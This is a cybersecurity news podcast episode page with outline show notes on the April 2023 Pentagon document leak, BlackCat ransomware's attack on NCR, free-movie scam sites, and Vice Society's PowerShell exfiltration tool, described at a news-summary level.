CyberSecurity News Byte

Hosted ByJim Guckin

Welcome to CyberSecurity News Byte with Jim Guckin, your one-stop resource for the latest cybersecurity news, updates, and discussions. Our podcast is a vital tool for CyberSecurity and IT professionals, as well as technology leaders, who need to stay on top of the ever-evolving digital landscape.

Episode 53: April 17 2023

April 17, 2023 Jim Guckin 31:3044.36M Comments Off

Links

https://www.axios.com/2023/04/10/what-we-know-pentagon-document-leak

https://securityaffairs.com/144866/cyber-crime/ncr-blackcat-alphv-ransomware.html

https://cyberwarzone.com/beware-of-movie365-and-similar-sites-offering-free-movies-online/

https://thehackernews.com/2023/04/vice-society-ransomware-using-stealthy.html

Pentagon Document Leak

Documents
- Various social media sites
  - Twitter
  - Telegram
- Documents leaking at least since January.
  - Discord
  - 4Chan
- Leaker
  - Jack Teixeira
    - 21 y/o
    - North Dighton, Massachusetts.
    - Massachusetts Air National Guard
  - Arrest
    - in connection to “unauthorized removal, retention and transmission of classified national defense information”
  - Discord Members
    - suspicious of law enforcement and the U.S. intelligence community
    - prone to ranting about “government overreach,”
  - Leak
    - photos of crumpled pieces of paper
      - laid on top of magazines.
        
        or surrounded by household objects.
      - leaked documents numbers roughly 100 pages,
      - The documents illustrate U.S. efforts to spy on Ukraine’s government and military leaders.
        
        lays out the U.S.’ extensive knowledge of Russian government intelligence.
        
        could hurt U.S. spy efforts if Russia figures out where the information is coming from.
        
        DLP?

NCR was the victim of BlackCat ransomware gang.

NCR Corporation
- software, consulting and technology company providing several professional services and electronic products.
- manufactures self-service kiosks, point-of-sale terminals, automated teller machines, check processing systems, and barcode scanners.
Outage
- Wednesday
- DFW05 datacenter
- outage on its Aloha point of sale platform
  - restaurant point-of-sale and management software
- notified law enforcement and engaged third-party cybersecurity experts.
  - investigate the incident and determine the scope of the attack.
- restaurants impacted are still able to serve their customers
  - impacted a specific functionality.
- BlackCat/ALPHV
  - AKA UNC4466
  - Since November 2021
  - added NCR to the list of victims on its Tor data leak site
  - Dominic Alivieri, CyberSecurity researcher published a chat message related to the negotiation between NCR and the ransomware gang.
  - removed the name of NCR from its leak site
    - probably because of an ongoing negotiation.

Free Movie Sites are a bad idea

Movies 365
- promise access to the latest movies
How they work
- designed to lure users
- make money by hosting forms and advertisements
  - possible malware
- collecting personal information from users
  - survey or enter their email address or phone number
  - sold to third-party advertisers
- Don’t just don’t

Vice Society Ransomware Using Stealthy PowerShell Exfiltration

Vice Society
- Microsoft Tracks as DEV-0832
- extortion-focused
- May 2021
New Tool
- bespoke PowerShell
  - avoids detection
    - living off the land binaries and scripts
      - no need to bring in external tools
    - automate exfil
  - ps1
    - identifying mounted drives
    - recursively searching through each of the root directories
    - focus on files over 10 KB
    - file extensions and in directories that meet its include list
    - Excludes
      - system files, backups, and folders pointing to web browsers
      - security solutions from Symantec, ESET, and Sophos
    - Utilizes multi-processing and queuing
      - ensures it does not consume too many system resources

BlackCat Pentagon Ransomware Top Secret Leak Vice Society